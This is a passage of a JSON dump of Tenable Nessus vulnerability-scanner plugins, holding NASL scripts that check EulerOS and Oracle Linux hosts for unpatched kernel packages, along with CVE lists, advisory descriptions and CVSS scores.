(EulerOS-SA-2019-1471)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124795);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2013-2889\",\n \"CVE-2013-4345\",\n \"CVE-2013-7421\",\n \"CVE-2014-0155\",\n \"CVE-2014-3122\",\n \"CVE-2014-4014\",\n \"CVE-2015-3332\",\n \"CVE-2015-4176\",\n \"CVE-2016-2184\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2017-14340\",\n \"CVE-2017-16531\",\n \"CVE-2017-18218\",\n \"CVE-2017-18360\",\n \"CVE-2017-5669\",\n \"CVE-2018-10675\",\n \"CVE-2018-11232\",\n \"CVE-2018-18710\",\n \"CVE-2018-7480\"\n );\n script_bugtraq_id(\n 62042,\n 62740,\n 66688,\n 67162,\n 67988,\n 72322,\n 74232\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1471)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889)\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014)\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl call.(CVE-2016-2545)\n\n - A flaw was found in the Linux kernel where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669)\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155)\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421)\n\n - Off-by-one error in the get_prng_bytes function in\n crypto/ansi_cprng.c in the Linux kernel through 3.11.4\n makes it easier for context-dependent attackers to\n defeat cryptographic protection mechanisms via multiple\n requests for small amounts of data, leading to improper\n management of the state of the consumed\n data.(CVE-2013-4345)\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n uses an incorrect type of mutex, which allows local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call.(CVE-2016-2546)\n\n - The do_get_mempolicy function in mm/mempolicy.c in the\n Linux kernel before 4.12.9 allows local users to cause\n a denial of service (use-after-free) or possibly have\n unspecified other impact via crafted system\n calls.(CVE-2018-10675)\n\n - A certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)\n\n - It was found that the try_to_unmap_cluster() function\n in the Linux kernel's Memory Managment subsystem did\n not properly handle page locking in certain cases,\n which could potentially trigger the BUG_ON() macro in\n the mlock_vma_page() function. A local, unprivileged\n user could use this flaw to crash the\n system.(CVE-2014-3122)\n\n - The blkcg_init_queue function in block/blk-cgroup.c in\n the Linux kernel, before 4.11, allows local users to\n cause a denial of service (double free) or possibly\n have unspecified other impact by triggering a creation\n failure.(CVE-2018-7480)\n\n - The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)\n\n - The etm_setup_aux function in\n drivers/hwtracing/coresight/coresight-etm-perf.c in the\n Linux kernel before 4.10.2 allows attackers to cause a\n denial of service (panic) because a parameter is\n incorrectly used as a local variable.(CVE-2018-11232)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - A flaw was found where the XFS filesystem code\n mishandles a user-settable inode flag in the Linux\n kernel prior to 4.14-rc1. This can cause a local denial\n of service via a kernel panic.(CVE-2017-14340)\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1471\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d86ae156\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:16:13", "bulletinFamily": "scanner", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.20.3.el7uek]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] \n{CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: \n26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. \nMiller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) \n[Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-4040.NASL", "href": "https://www.tenable.com/plugins/nessus/107051", "published": "2018-02-28T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4040)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4040.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107051);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-16535\", \"CVE-2017-7482\", \"CVE-2017-8824\", \"CVE-2017-9074\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4040)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.20.3.el7uek]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] \n{CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: \n26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. \nMiller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) \n[Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket \ndecode (David Howells) [Orabug: 26880517] {CVE-2017-7482} {CVE-2017-7482}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables \nmapping (Zhenzhong Duan) [Orabug: 26883322]\n- KVM: x86: fix deadlock in clock-in-progress request handling (Marcelo \nTosatti) [Orabug: 27065995]\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim \n(Ashish Samant) [Orabug: 27099835]\n- USB: serial: console: fix use-after-free after failed setup (Johan \nHovold) [Orabug: 27206837] {CVE-2017-16525}\n- uwb: properly check kthread_run return value (Andrey Konovalov) \n[Orabug: 27206897] {CVE-2017-16526}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer \ndescriptor (Takashi Iwai) [Orabug: 27206928] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) \n[Orabug: 27207240] {CVE-2017-16531}\n- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor() \n(Alan Stern) [Orabug: 27207983] {CVE-2017-16535}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) \n[Orabug: 27290301] {CVE-2017-8824}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007537.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007538.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-16535\", \"CVE-2017-7482\", \"CVE-2017-8824\", \"CVE-2017-9074\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4040\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:16:14", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.298.3.el6uek]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) \n[Orabug: 17488415]\n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix \n(Todd Poynor) [Orabug: 17488415]\n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore \nTs", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-4041.NASL", "href": "https://www.tenable.com/plugins/nessus/107052", "published": "2018-02-28T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4041)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4041.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107052);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-6951\", \"CVE-2017-7482\", \"CVE-2017-8824\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.298.3.el6uek]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) \n[Orabug: 17488415]\n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix \n(Todd Poynor) [Orabug: 17488415]\n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore \nTs'o) [Orabug: 17488415]\n- ext4: init pagevec in ext4_da_block_invalidatepages (Eric Sandeen) \n[Orabug: 17488415]\n- ext4: do not try to write superblock on ro remount w/o journal \n(Michael Tokarev) [Orabug: 17488415]\n- xen-netback: fix grant_copy_op array size (Niranjan Patil) [Orabug: \n25653941]\n- xen-netback: explicitly check max_slots_needed against meta_prod \ncounter (Niranjan Patil) [Orabug: 25653941]\n- xen-netback: Fix handling of skbs requiring too many slots (Zoltan \nKiss) [Orabug: 25653941]\n- xen-netback: worse-case estimate in xenvif_rx_action is \nunderestimating (Paul Durrant) [Orabug: 25653941]\n- xen-netback: Add worse-case estimates of max_slots_needed in \nnetbk_rx_action (Niranjan Patil) [Orabug: 25653941]\n- KEYS: Remove key_type::match in favour of overriding default by \nmatch_preparse (Tim Tianyang Chen) [Orabug: 25757946] {CVE-2017-6951}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables \nmapping (Zhenzhong Duan) [Orabug: 26737475]\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) \n[Orabug: 26813391] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket \ndecode (David Howells) [Orabug: 26880520] {CVE-2017-7482} {CVE-2017-7482}\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim \n(Ashish Samant) [Orabug: 27099836]\n- Check validity of cl_rpcclient in nfs_server_list_show (Malahal \nNaineni) [Orabug: 27112186]\n- USB: serial: console: fix use-after-free after failed setup (Johan \nHovold) [Orabug: 27206839] {CVE-2017-16525}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer \ndescriptor (Takashi Iwai) [Orabug: 27206934] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) \n[Orabug: 27207243] {CVE-2017-16531}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) \n[Orabug: 27290308] {CVE-2017-8824}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007539.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate 